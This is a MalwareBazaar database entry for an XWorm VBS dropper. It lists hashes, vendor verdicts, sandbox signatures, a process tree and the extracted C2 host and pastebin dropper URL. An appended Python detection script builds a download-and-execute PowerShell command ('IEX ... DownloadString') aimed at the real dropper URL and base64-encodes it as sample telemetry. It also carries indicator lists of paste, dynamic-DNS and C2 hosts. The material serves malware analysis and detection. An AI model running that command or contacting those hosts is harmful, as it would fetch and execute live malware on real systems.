MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 06eb284366b1e9ef0cb5dde4f81e8ad974370d6ca1cf6e9969a9721ee5a6df2d. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

Signature: XWorm
Vendor detections: 11



SHA256 hash: 06eb284366b1e9ef0cb5dde4f81e8ad974370d6ca1cf6e9969a9721ee5a6df2d
SHA3-384 hash: 79938044a67b1ab6a6c350d933d075e486a10f2a0b1725e92ac2c4d01e531b9330039a7707a0aca8013a838146e81e67
SHA1 hash: dae167b9d105e0a29dfb43d83540634819c41f0f
MD5 hash: b18fcb9a2af66c700b70cd9f9a58a563
humanhash: grey-double-robin-butter
File name: sostener.vbs
Signature: XWorm
File size: 16'171'698 bytes
First seen: 2024-10-03 04:51:19 UTC
Last seen: Never
File type: Visual Basic Script (vbs)
MIME type: text/plain
ssdeep: 384:ySSSSbSSSSbSSSSbSSSSCSSSSbSSSSbSSSSbSSSSbSSSSbSSSSbSSSSbSSSSCSSB:4
Threatray: 1'508 similar samples on MalwareBazaar
TLSH: T10DF6B434ED6E6447BD3F41EF3A616872C51B9B0612C24C3B292A504F4EBE6017EB1DE9
TrID: 66.6% (.TXT) Text - UTF-16 (LE) encoded (2000/1)
      33.3% (.MP3) MP3 audio (1000/1)
Magika: unknown
Reporter: lontze7
Tags: vbs xworm

Intelligence


File Origin
# of uploads: 1
# of downloads: 120
Origin country: FR
Vendor Threat Intelligence
Verdict: Malicious
Score: 81.4%
Tags: Dropper

Verdict: Malicious
Threat level: 10/10
Confidence: 100%
Tags: powershell

Result
Verdict: MALICIOUS

Result
Threat name:
Detection: malicious
Classification: troj.expl.evad
Score: 100 / 100
Signature
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Found malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign process
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suricata IDS alerts for network traffic
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript called in batch mode (suppress errors)
Wscript starts Powershell (via cmd or directly)
Yara detected AntiVM3
Yara detected Generic Downloader
Yara detected Powershell download and execute
Yara detected XWorm
Behaviour
Behavior Graph:
Behavior Graph ID: 1524706 | Sample: sostener.vbs | Start date: 03/10/2024 | Architecture: WINDOWS | Score: 100

Sandbox-wide network: toskaadmx.duckdns.org; pastebin.com; 5 other IPs or domains
Sandbox-wide signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 22 other signatures
Uses dynamic DNS services (toskaadmx.duckdns.org); Connects to a pastebin service (likely for C&C) (pastebin.com)

Process tree (sandbox process IDs in parentheses):
wscript.exe (10)
  signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Windows Scripting host queries suspicious COM object (likely to drop second stage); Suspicious execution chain found
  powershell.exe (15)
    signatures: Suspicious powershell command line found; Suspicious execution chain found; Found suspicious powershell code related to unpacking or dynamic code loading; Wscript called in batch mode (suppress errors)
    powershell.exe (22)
      network: pastebin.com 104.20.4.235:443 (source ports 49704, 49705; CLOUDFLARENET, United States); paste.ee 188.114.96.3:443 (source ports 49711, 49728; CLOUDFLARENET, European Union); 2 other IPs or domains
      dropped: ___win____________...________-------.lnk (MS)
      signatures: Writes to foreign memory regions; Injects a PE file into a foreign process
      powershell.exe (31)
        dropped: C:\Users\...\sostener.vbs:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\sostener.vbs (Unicode)
      RegAsm.exe (34)
        signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
      RegAsm.exe (37)
        network: toskaadmx.duckdns.org 46.246.14.3:7000 (source port 49712; PORTLANE, Sweden)
    conhost.exe (27)
powershell.exe (13)
  signatures: Wscript called in batch mode (suppress errors)
  wscript.exe (18)
    signatures: Wscript starts Powershell (via cmd or directly)
    powershell.exe (29)
      signatures: Suspicious powershell command line found
      powershell.exe (40)
        network: 3.5.25.83:443 (source port 49724; AMAZON-AES, United States)
        signatures: Writes to foreign memory regions; Injects a PE file into a foreign process
        powershell.exe (44)
        RegAsm.exe (46)
      conhost.exe (42)
  conhost.exe (20)
Threat name: Script-WScript.Trojan.Honolulu
Status: Malicious
First seen: 2024-10-03 04:52:07 UTC
File Type: Binary
AV detection: 8 of 24 (33.33%)
Threat level: 5/5
Result
Malware family:
Score: 10/10
Tags: family:xworm discovery execution rat trojan
Behaviour
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Suspicious use of SetThreadContext
Command and Scripting Interpreter: PowerShell
Legitimate hosting services abused for malware hosting/C2
Checks computer location settings
Drops startup file
Blocklisted process makes network request
Detect Xworm Payload
Xworm
Malware Config
C2 Extraction: toskaadmx.duckdns.org:7000
Dropper Extraction: http://pastebin.com/raw/V9y5Q5vv
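The Sigma and sandbox signatures listed above (WScript dropper, Base64-encoded PowerShell, FromBase64String, reversed-command obfuscation, PowerShell spawning RegAsm.exe, dynamic DNS and paste-service traffic) and the extracted C2 and dropper URL together describe one execution chain. The script below is an added example, not MalwareBazaar's or any vendor's code, that turns those observations into detection logic and runs it over constructed Sysmon-style process and network records. The log records, the paths (including the Temp folder, which this entry only shows truncated), the decoded PowerShell payload and the rule names are all assumptions made for illustration; the C2 host and port, the paste hosts and the dropper URL are taken from this entry.

```python
import base64
import re
from dataclasses import dataclass
from typing import List, Tuple

# Indicators copied from this entry: the extracted C2, the paste services and
# the dynamic-DNS provider seen in the behaviour graph.
C2_HOST = "toskaadmx.duckdns.org"
C2_PORT = 7000
PASTE_HOSTS = {"pastebin.com", "paste.ee"}
DYNDNS_SUFFIXES = (".duckdns.org",)

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
INJECTION_TARGETS = {"regasm.exe"}   # RegAsm.exe is the process XWorm was injected into here
# Reversed keywords of the kind a "reversed commands" obfuscation rule looks for.
REVERSED_TOKENS = ("llehsrewop", "gnirts46esabmorf", "noisserpxe-ekovni")

# PowerShell accepts any unambiguous prefix of -EncodedCommand; common spellings listed.
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})")


@dataclass
class Event:
    """One constructed telemetry record (Sysmon-like fields, not real sandbox output)."""
    kind: str              # "process" (EID 1 style) or "network" (EID 3/22 style)
    image: str             # image path of the acting process
    parent: str = ""       # parent image path (process events)
    cmdline: str = ""      # command line (process events)
    dst_host: str = ""     # destination hostname (network events)
    dst_port: int = 0


def base_name(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> str:
    """Return the UTF-16LE text behind -EncodedCommand, or '' if absent or undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def run_detections(events: List[Event]) -> List[Tuple[int, str]]:
    """Apply rules modelled on this entry's signatures; return (event index, rule name) hits."""
    hits: List[Tuple[int, str]] = []
    for i, ev in enumerate(events):
        img, par, low = base_name(ev.image), base_name(ev.parent), ev.cmdline.lower()
        if ev.kind == "process":
            if par in SCRIPT_HOSTS and img == "powershell.exe":
                hits.append((i, "WScript/CScript starts PowerShell"))
            if img in SCRIPT_HOSTS and re.search(r"\\appdata\\local\\temp\\[^\s\"]+\.(?:vbs|js|wsf)", low):
                hits.append((i, "Script interpreter execution from Temp folder"))
            if img in SCRIPT_HOSTS and re.search(r"(?:^|\s)//b\b", low):
                hits.append((i, "WScript called in batch mode (//B)"))
            if img == "powershell.exe":
                decoded = decode_encoded_command(ev.cmdline)
                if decoded:
                    hits.append((i, "Base64 encoded PowerShell command"))
                text = low + " " + decoded.lower()   # inspect the decoded payload too
                if "frombase64string" in text:
                    hits.append((i, "FromBase64String cmdlet"))
                if any(t in text for t in REVERSED_TOKENS):
                    hits.append((i, "Reversed-string obfuscation"))
                if any(h in text for h in PASTE_HOSTS):
                    hits.append((i, "Paste service referenced by PowerShell"))
            if par == "powershell.exe" and img in INJECTION_TARGETS:
                hits.append((i, "PowerShell spawns RegAsm.exe (injection target)"))
        elif ev.kind == "network":
            host = ev.dst_host.lower()
            if host.endswith(DYNDNS_SUFFIXES):
                hits.append((i, "Dynamic DNS host contacted"))
            if host == C2_HOST and ev.dst_port == C2_PORT:
                hits.append((i, "Known XWorm C2 (from this sample's config)"))
            if host in PASTE_HOSTS:
                hits.append((i, "Paste service contacted"))
    return hits


# Constructed sample telemetry mirroring the chain in the behaviour graph (assumed paths).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WS = r"C:\Windows\System32\wscript.exe"
# Assumed staging command; only the dropper URL comes from this entry's Malware Config.
SAMPLE_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv')"
SAMPLE_ENC = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    Event("process", WS, r"C:\Windows\explorer.exe",
          r"wscript.exe //B C:\Users\user\AppData\Local\Temp\sostener.vbs"),
    Event("process", PS, WS, "powershell.exe -NoProfile -enc " + SAMPLE_ENC),
    Event("process", PS, PS,
          "powershell.exe -c \"$p=[Convert]::FromBase64String($x);$r='llehsrewop'\""),
    Event("process", r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", PS, "RegAsm.exe"),
    Event("network", PS, dst_host="pastebin.com", dst_port=443),
    Event("network", "RegAsm.exe", dst_host="toskaadmx.duckdns.org", dst_port=7000),
    Event("process", r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe", "notepad.exe"),  # benign
]

if __name__ == "__main__":
    for idx, rule in run_detections(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

The parent/child checks are the durable part of this logic: the duckdns host, the port and the pastebin path are specific to this sample and will change between builds, whereas wscript.exe launching powershell.exe with an encoded command that then spawns RegAsm.exe is the shape of the loader itself. Decoding -EncodedCommand before matching matters because the paste URL and FromBase64String call are only visible inside the UTF-16LE payload, not in the raw command line.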

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Delivery method: Distributed via web download
Signature: XWorm
File type: Visual Basic Script (vbs)
SHA256: 06eb284366b1e9ef0cb5dde4f81e8ad974370d6ca1cf6e9969a9721ee5a6df2d (this sample)